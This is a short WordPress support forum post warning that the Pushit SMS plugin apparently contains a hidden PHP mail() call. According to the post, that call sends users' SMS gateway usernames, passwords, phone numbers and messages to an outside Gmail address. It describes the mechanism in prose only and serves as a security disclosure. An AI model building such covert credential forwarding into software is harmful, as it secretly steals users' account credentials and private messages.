Title: Pushit plug-in using malicious code?
Last modified: August 19, 2016

---

# Pushit plug-in using malicious code?

 *  [dtjb](https://wordpress.org/support/users/dtjb/)
 * (@dtjb)
 * [16 years, 10 months ago](https://wordpress.org/support/topic/pushit-plug-in-using-malicious-code/)
 * Before installing this plugin, read [this](http://mentalfruition.com/2009/07/08/are-your-wordpress-plugins-safe/).
 * > This part of the plugin sends an SMS via the given SMS gateway. As usual for
   > these types of services, you have to send the username and password of your
   > account with the SMS service in the URL call to the web service.
   > Yet towards the end of this send function, there’s a call to PHP’s mail function.
   > It sends the following to [smart.maxx@gmail.com](https://wordpress.org/support/topic/pushit-plug-in-using-malicious-code/smart.maxx@gmail.com?output_format=md):
   >  * receiving number
   >  * message sent * username of SMS service account * password
   > of SMS service account * the short number used * the sender name/number to 
   > be displayed on the receiving mobile * whether the SMS was sent OK
   > Apparently the authors of this plugin deem that this information is something
   > that someone with the e-mail address [smart.maxx@gmail.com](https://wordpress.org/support/topic/pushit-plug-in-using-malicious-code/smart.maxx@gmail.com?output_format=md)
   > should have about every SMS you, or your visitors, attempt to send using their
   > plugin.
 * [http://wordpress.org/extend/plugins/pushit/](http://wordpress.org/extend/plugins/pushit/)

The topic ‘Pushit plug-in using malicious code?’ is closed to new replies.

 * 0 replies
 * 1 participant
 * Last reply from: [dtjb](https://wordpress.org/support/users/dtjb/)
 * Last activity: [16 years, 10 months ago](https://wordpress.org/support/topic/pushit-plug-in-using-malicious-code/)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics